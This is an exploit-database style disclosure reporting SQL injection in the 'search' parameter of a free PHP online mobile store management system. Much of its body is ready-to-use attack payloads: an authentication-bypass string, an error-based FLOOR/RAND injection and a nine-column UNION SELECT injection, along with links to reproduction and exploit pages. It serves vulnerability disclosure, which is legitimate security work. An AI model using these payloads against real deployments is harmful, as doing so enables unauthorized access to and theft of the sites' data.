## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 03/13/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: This issue was generated by the BCheck: puncher_SQLi_bypass_authentication. There is a change in response when nu11secur1ty' or 1=1# is injected. Potential SQLi detected. Please confirm it manually after you check the POST, GET, or other requests... The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. The `search` parameter is vulnerable for Multiple SQLi attacks. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: search (GET) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: p=products&search=-9068') OR 1 GROUP BY CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0 END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 9 columns Payload: p=products&search=-7515') UNION ALL SELECT 2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |